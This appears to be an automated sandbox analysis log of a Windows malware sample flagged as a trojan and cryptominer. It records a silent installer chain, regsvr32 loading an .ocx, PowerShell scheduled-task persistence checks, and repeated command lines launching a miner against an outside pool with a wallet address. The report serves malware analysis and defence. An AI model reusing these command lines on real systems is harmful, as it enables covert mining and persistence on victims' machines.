          Source: Stamp_Setup.exe, 00000009.00000003.2208117254.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000009.00000003.2207823891.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000000.2208874921.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Stamp_Setup.tmp.11.dr, is-T07R8.tmp.12.dr, Stamp_Setup.tmp.9.drString found in binary or memory: http://www.innosetup.com/
          Source: powershell.exe, 0000000F.00000002.2346451258.000001AD4F3AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
          Source: Stamp_Setup.exe, 00000009.00000003.2208117254.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.exe, 00000009.00000003.2207823891.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Stamp_Setup.tmp, 0000000A.00000000.2208874921.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Stamp_Setup.tmp.11.dr, is-T07R8.tmp.12.dr, Stamp_Setup.tmp.9.drString found in binary or memory: http://www.remobjects.com/ps
          Source: powershell.exe, 0000000F.00000002.2314170593.000001AD37201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DB9C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3296328349.0000017280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E1241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 0000000F.00000002.2314170593.000001AD38E53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2314170593.000001AD38E2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DD617000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DD5F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E2E8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E2E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support/rust/deps
          Source: powershell.exe, 00000017.00000002.2563510013.00000260E1467000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 0000000F.00000002.2346451258.000001AD4F3AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.mh
          Source: powershell.exe, 0000000F.00000002.2314170593.000001AD391CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2386841353.00000227DD993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2563510013.00000260E3208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 0000000F.00000002.2340817033.000001AD47267000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2476958732.00000227EBA27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2723313503.00000260F12A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65257
          Source: unknownNetwork traffic detected: HTTP traffic on port 65259 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 65257 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65259
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.8:65257 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.8:65259 version: TLS 1.2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess Stats: CPU usage > 49%
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_00007FFB4B1C4FFB15_2_00007FFB4B1C4FFB
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp 266718A4D3E4A60D060E8E7B39E4A80CB497752D8C01568F98C7D657A83FCC3E
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp 266718A4D3E4A60D060E8E7B39E4A80CB497752D8C01568F98C7D657A83FCC3E
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\is-9STL2.tmp\_isetup\_isdecmp.dll E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
          Source: Stamp_Setup.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: Stamp_Setup.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: Stamp_Setup.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
          Source: Stamp_Setup.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: Stamp_Setup.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
          Source: is-T07R8.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
          Source: is-T07R8.tmp.12.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeStatic PE information: Number of sections : 11 > 10
          Source: is-H1DAG.tmp.12.drStatic PE information: Number of sections : 12 > 10
          Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winEXE@40/35@3/4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeFile created: C:\Users\user\AppData\Roaming\Stamp_Setup.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeMutant created: \Sessions\1\BaseNamedObjects\94a5dd291cdb
          Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\f89114cf33aebcc91e3e40b5b0ff7e34
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1308:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4792:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeMutant created: \Sessions\1\BaseNamedObjects\StrangeRod
          Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\IntriguedLeopard
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
          Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\2f4cb03984c191cc482337
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeFile created: C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.batJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" "
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeVirustotal: Detection: 58%
          Source: SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeReversingLabs: Detection: 50%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp" /SL5="$A0052,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp" /SL5="$C01D8,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\u9KSgzq29lys.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhostJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmp" /SL5="$A0052,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-2SFE3.tmp\Stamp_Setup.tmpProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeProcess created: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp "C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmp" /SL5="$C01D8,1101402,160256,C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENTJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\is-1SGH6.tmp\Stamp_Setup.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"Jump to behavior
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\9mpr_8.ocx"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x49B3f8Aee91B59722795A67C2dc0c0c7E74a9cee.RIG_CPU -p x --cpu-max-threads-hint=50Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.20212.7823.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
